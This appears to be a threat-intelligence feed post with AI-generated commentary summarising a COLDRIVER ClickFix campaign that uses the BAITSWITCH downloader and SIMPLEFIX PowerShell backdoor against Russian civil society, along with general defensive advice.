OpenCTI Live Threat Report Feed

Updates Arsenal with BAITSWITCH and SIMPLEFIX

NetmanageIT OpenCTI - opencti.netmanageit.com

Daniel Bender

Sep 25, 2025 • 2 min read

SUMMARY :

A new multi-stage ClickFix campaign, attributed to the Russia-linked APT group COLDRIVER, has been discovered targeting Russian civil society members. The campaign employs social engineering techniques to trick users into executing malicious commands, leading to the deployment of two new malware families: BAITSWITCH (a downloader) and SIMPLEFIX (a PowerShell-based backdoor). The attack chain involves a fake Cloudflare Turnstile checkbox, persistence establishment, and data exfiltration. COLDRIVER's tactics include using server-side checks, obfuscation techniques, and targeting specific file types for intelligence collection. The group's focus on NGOs, human rights defenders, and Russian exiles aligns with their known victimology.

OPENCTI LABELS :

apt,backdoor,powershell,social engineering,russia,clickfix,baitswitch,simplefix

AI COMMENTARY :

1. The recent intelligence report titled Updates Arsenal with BAITSWITCH and SIMPLEFIX reveals a sophisticated multi-stage ClickFix campaign attributed to the Russia-linked APT group COLDRIVER. This campaign specifically targets members of Russian civil society, including NGOs, human rights defenders, and exiles. By posing a fake Cloudflare Turnstile checkbox, attackers lure victims into executing hidden malicious commands under the guise of routine verification. The deceptive social engineering tactic serves as the gateway to a complex attack chain that ultimately compromises critical data assets.

2. At the heart of the operation lies BAITSWITCH, a powerful downloader designed to fetch additional payloads upon initial execution. BAITSWITCH leverages server-side checks to verify victim attributes before delivering its content. Its code is heavily obfuscated, thwarting automated analysis and complicating detection efforts. Once BAITSWITCH gains a foothold on the system, it persistently ensures that subsequent stages of the ClickFix campaign remain operational, establishing resilience against reboots and simple cleanup attempts.

3. The second stage of the attack unfolds with SIMPLEFIX, a PowerShell-based backdoor that grants remote access to the threat actors. By abusing legitimate Windows management frameworks, SIMPLEFIX operates with minimal artifacts on disk, blending into normal system processes. The backdoor enables COLDRIVER operators to execute arbitrary commands, harvest specified file types such as documents and spreadsheets, and exfiltrate intelligence related to NGO activities and dissident communications. The use of PowerShell underscores the groups preference for living-off-the-land techniques that evade traditional antivirus solutions.

4. COLDRIVERs operational tradecraft in this campaign highlights several hallmark tactics of Russia-linked APTs. Social engineering remains central, with tailored lures crafted to resonate with targets roles and interests within civil society. Obfuscation at both downloader and backdoor stages thwarts static signature detection. Server-side gating ensures that malicious commands only activate in designated environments, reducing the risk of accidental exposure. These measures collectively demonstrate the adversarys commitment to stealth and targeted intelligence collection.

5. The victimology of this ClickFix operation aligns with COLDRIVERs historical focus on politically sensitive groups and individuals. By prioritizing NGOs, human rights defenders, and Russian exile communities, the attackers seek insights into internal discussions, strategic planning, and external support networks. The exfiltration of sensitive documents and correspondence not only enriches the groups intelligence repository but also enables potential follow-on operations, including blackmail or public exposure of dissident activities.

6. Defending against this campaign requires a layered approach combining user training, endpoint monitoring, and network safeguards. Organizations should educate personnel about the dangers of unsolicited verification prompts and the importance of verifying web elements before interacting. Endpoint detection solutions must be configured to flag unusual PowerShell execution patterns and downloader behaviors consistent with BAITSWITCH. Network defenses can throttle or block known ClickFix command-and-control domains, disrupting the campaigns communication channels. By integrating these measures, defenders can mitigate the risks posed by this evolving APT threat.

OPEN NETMANAGEIT OPENCTI REPORT LINK!

Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.

Updates Arsenal with BAITSWITCH and SIMPLEFIX